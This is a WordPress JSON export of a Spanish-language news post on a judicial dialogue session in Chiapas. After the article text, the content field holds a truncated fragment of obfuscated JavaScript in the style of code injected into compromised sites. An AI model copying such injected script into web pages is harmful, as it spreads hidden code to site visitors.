{"id":20158,"date":"2025-02-01T05:30:15","date_gmt":"2025-02-01T05:30:15","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20158"},"modified":"2025-02-01T05:30:16","modified_gmt":"2025-02-01T05:30:16","slug":"realizan-tercera-sesion-de-los-dialogos-por-la-justicia-con-humanismo-en-el-poder-judicial-de-chiapas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20158","title":{"rendered":"Realizan tercera sesi\u00f3n de los Di\u00e1logos por la Justicia con Humanismo en el Poder Judicial de Chiapas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-1024x682.jpg\" alt=\"\" class=\"wp-image-20159\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-1536x1024.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-2048x1365.jpg 2048w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250131-WA0049-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>31 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente Juan Carlos Moreno Guill\u00e9n, llev\u00f3 a cabo la tercera sesi\u00f3n de los Di\u00e1logos por la Justicia con Humanismo, Cap\u00edtulo Penal, un espacio de reflexi\u00f3n y an\u00e1lisis.<\/p>\n\n\n\n<p>En esta edici\u00f3n, magistradas y magistrados en materia Penal y de Justicia para Adolescentes de Tuxtla, as\u00ed como en materia Penal de Tapachula y regionales mixtos de San Crist\u00f3bal y Pichucalco, compartieron sus experiencias y puntos de vista sobre los retos actuales en el \u00e1mbito de la justicia penal y juvenil.<\/p>\n\n\n\n<p>El magistrado presidente, destac\u00f3 la relevancia de estos encuentros para la homogenizaci\u00f3n de criterios en las sentencias judiciales, subrayando que estos conversatorios contribuyen a fortalecer el sistema judicial chiapaneco.<\/p>\n\n\n\n<p>&#8220;Estos di\u00e1logos permiten un acercamiento directo que facilita la unificaci\u00f3n de criterios, asegurando que las sentencias sean m\u00e1s justas y equitativas, lo que va de la mano con las pol\u00edticas p\u00fablicas impulsadas por el gobierno estatal para fortalecer la seguridad y el estado de derecho en Chiapas.\u201d, expres\u00f3 Moreno Guill\u00e9n.<\/p>\n\n\n\n<p>Finalmente, el magistrado presidente adelant\u00f3 que se dar\u00e1 seguimiento a este ejercicio, con la ampliaci\u00f3n de los Di\u00e1logos por la Justicia con Humanismo en materia Civil y Familiar, buscando fortalecer la unidad y coherencia en las decisiones judiciales en todos los \u00e1mbitos.<\/p>\n\n\n\n<p>Este esfuerzo refleja el compromiso del Poder Judicial de Chiapas con la mejora continua, lo que representa un avance hacia una nueva era de justicia en la entidad, m\u00e1s moderna y con un enfoque humanista.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 31 de enero del 2025. Tuxtla Guti\u00e9rrez. &#8211; El Poder Judicial del Estado de Chiapas, encabezado por el magistrado presidente Juan Carlos Moreno Guill\u00e9n, llev\u00f3 a cabo la tercera sesi\u00f3n de los Di\u00e1logos por la Justicia con Humanismo, Cap\u00edtulo Penal, un espacio de reflexi\u00f3n y an\u00e1lisis. En esta edici\u00f3n, magistradas y magistrados en materia &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20159,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-20158","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20158","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20158"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20158\/revisions"}],"predecessor-version":[{"id":20160,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20158\/revisions\/20160"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20159"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20158"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20158"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20158"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}